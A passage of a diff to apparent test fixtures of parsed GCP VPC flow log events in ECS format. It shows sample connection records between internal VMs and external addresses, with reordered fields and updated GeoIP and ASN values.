"{\"insertId\":\"14iipwlfd8t017\",\"jsonPayload\":{\"bytes_sent\":\"51612\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65277,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316890309Z\",\"packets_sent\":\"615\",\"reporter\":\"SRC\",\"rtt_msec\":\"95\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760385211Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.760385211Z", + "end": "2019-06-14T03:49:56.316890309Z", + "id": "14iipwlfd8t017", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -25191,25 +26426,24 @@ "iana_number": "6", "packets": 615, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.139.99.242", - "67.43.156.13" + "67.43.156.13", + "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 95 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -25220,23 +26454,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 123 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392583600Z", - "original": "{\"insertId\":\"14iipwlfd8t017\",\"jsonPayload\":{\"bytes_sent\":\"51612\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65277,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316890309Z\",\"packets_sent\":\"615\",\"reporter\":\"SRC\",\"rtt_msec\":\"95\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760385211Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.760385211Z", - "end": "2019-06-14T03:49:56.316890309Z", - "id": "14iipwlfd8t017", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -25245,13 +26470,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65272, @@ -25259,6 +26487,16 @@ "ip": "67.43.156.13", "packets": 745 }, + "event": { + "ingested": "2021-12-14T14:43:27.415305671Z", + "original": "{\"insertId\":\"14iipwlfd8t01m\",\"jsonPayload\":{\"bytes_sent\":\"74330\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65272},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316981133Z\",\"packets_sent\":\"745\",\"reporter\":\"DEST\",\"rtt_msec\":\"123\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.403442252Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:39:59.403442252Z", + "end": "2019-06-14T03:49:56.316981133Z", + "id": "14iipwlfd8t01m", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -25270,19 +26508,30 @@ "iana_number": "6", "packets": 745, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.139.99.242" + "10.87.40.76", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -25293,36 +26542,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 123 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392589100Z", - "original": "{\"insertId\":\"14iipwlfd8t01m\",\"jsonPayload\":{\"bytes_sent\":\"74330\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65272},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316981133Z\",\"packets_sent\":\"745\",\"reporter\":\"DEST\",\"rtt_msec\":\"123\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.403442252Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:39:59.403442252Z", - "end": "2019-06-14T03:49:56.316981133Z", - "id": "14iipwlfd8t01m", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 59924, @@ -25336,6 +26569,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415306080Z", + "original": "{\"insertId\":\"14iipwlfd8t015\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":59924,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:08.213471928Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:08.092659117Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:41:08.092659117Z", + "end": "2019-06-14T03:41:08.213471928Z", + "id": "14iipwlfd8t015", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -25347,61 +26590,54 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", + "10.139.99.242", "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", "rtt": { - "ms": 36 + "ms": 115 } }, "source": { "vpc": { "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.392594600Z", - "original": "{\"insertId\":\"14iipwlfd8t015\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":59924,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:08.213471928Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:08.092659117Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:41:08.092659117Z", - "end": "2019-06-14T03:41:08.213471928Z", - "id": "14iipwlfd8t015", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + } }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65273, @@ -25415,6 +26651,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415306489Z", + "original": "{\"insertId\":\"14iipwlfd8t01h\",\"jsonPayload\":{\"bytes_sent\":\"76622\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65273,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316930467Z\",\"packets_sent\":\"599\",\"reporter\":\"SRC\",\"rtt_msec\":\"115\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.155378287Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.155378287Z", + "end": "2019-06-14T03:49:56.316930467Z", + "id": "14iipwlfd8t01h", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -25426,25 +26672,24 @@ "iana_number": "6", "packets": 599, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.139.99.242", - "67.43.156.13" + "192.168.2.73", + "10.73.186.17" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 115 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -25455,23 +26700,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 242 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392600100Z", - "original": "{\"insertId\":\"14iipwlfd8t01h\",\"jsonPayload\":{\"bytes_sent\":\"76622\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65273,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316930467Z\",\"packets_sent\":\"599\",\"reporter\":\"SRC\",\"rtt_msec\":\"115\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.155378287Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.155378287Z", - "end": "2019-06-14T03:49:56.316930467Z", - "id": "14iipwlfd8t01h", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.73.186.17", "port": 22, @@ -25494,6 +26730,16 @@ "ip": "192.168.2.73", "packets": 5 }, + "event": { + "ingested": "2021-12-14T14:43:27.415306977Z", + "original": "{\"insertId\":\"14iipwlfd8t019\",\"jsonPayload\":{\"bytes_sent\":\"42\",\"connection\":{\"dest_ip\":\"10.73.186.17\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.168.2.73\",\"src_port\":45224},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:24.922448897Z\",\"packets_sent\":\"5\",\"reporter\":\"DEST\",\"rtt_msec\":\"242\",\"src_location\":{\"asn\":4847,\"city\":\"Beijing\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Beijing\"},\"start_time\":\"2019-06-14T03:42:23.705320616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:42:23.705320616Z", + "end": "2019-06-14T03:42:24.922448897Z", + "id": "14iipwlfd8t019", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -25505,17 +26751,22 @@ "iana_number": "6", "packets": 5, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "192.168.2.73", - "10.73.186.17" + "67.43.156.13", + "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -25532,25 +26783,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 242 + "ms": 95 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392605600Z", - "original": "{\"insertId\":\"14iipwlfd8t019\",\"jsonPayload\":{\"bytes_sent\":\"42\",\"connection\":{\"dest_ip\":\"10.73.186.17\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.168.2.73\",\"src_port\":45224},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:24.922448897Z\",\"packets_sent\":\"5\",\"reporter\":\"DEST\",\"rtt_msec\":\"242\",\"src_location\":{\"asn\":4847,\"city\":\"Beijing\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Beijing\"},\"start_time\":\"2019-06-14T03:42:23.705320616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:42:23.705320616Z", - "end": "2019-06-14T03:42:24.922448897Z", - "id": "14iipwlfd8t019", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -25559,13 +26795,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65277, @@ -25573,6 +26812,16 @@ "ip": "67.43.156.13", "packets": 729 }, + "event": { + "ingested": "2021-12-14T14:43:27.415307365Z", + "original": "{\"insertId\":\"14iipwlfd8t016\",\"jsonPayload\":{\"bytes_sent\":\"75263\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65277},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316890309Z\",\"packets_sent\":\"729\",\"reporter\":\"DEST\",\"rtt_msec\":\"95\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760385211Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.760385211Z", + "end": "2019-06-14T03:49:56.316890309Z", + "id": "14iipwlfd8t016", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -25584,19 +26833,27 @@ "iana_number": "6", "packets": 729, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.139.99.242" + "10.87.40.76", + "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC" + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -25607,36 +26864,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 95 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392611300Z", - "original": "{\"insertId\":\"14iipwlfd8t016\",\"jsonPayload\":{\"bytes_sent\":\"75263\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65277},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316890309Z\",\"packets_sent\":\"729\",\"reporter\":\"DEST\",\"rtt_msec\":\"95\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760385211Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.760385211Z", - "end": "2019-06-14T03:49:56.316890309Z", - "id": "14iipwlfd8t016", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 34646, @@ -25650,6 +26891,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415307852Z", + "original": "{\"insertId\":\"14iipwlfd8t01c\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":34646,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:10.529592195Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:10.413494375Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:48:10.413494375Z", + "end": "2019-06-14T03:48:10.529592195Z", + "id": "14iipwlfd8t01c", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -25661,22 +26912,24 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "67.43.156.14" + "67.43.156.14", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC" - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -25687,23 +26940,11 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST" } }, - "event": { - "ingested": "2021-12-09T13:37:46.392616800Z", - "original": "{\"insertId\":\"14iipwlfd8t01c\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":34646,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:10.529592195Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:10.413494375Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:48:10.413494375Z", - "end": "2019-06-14T03:48:10.529592195Z", - "id": "14iipwlfd8t01c", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -25712,11 +26953,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 34646, @@ -25724,6 +26970,16 @@ "ip": "67.43.156.14", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415308249Z", + "original": 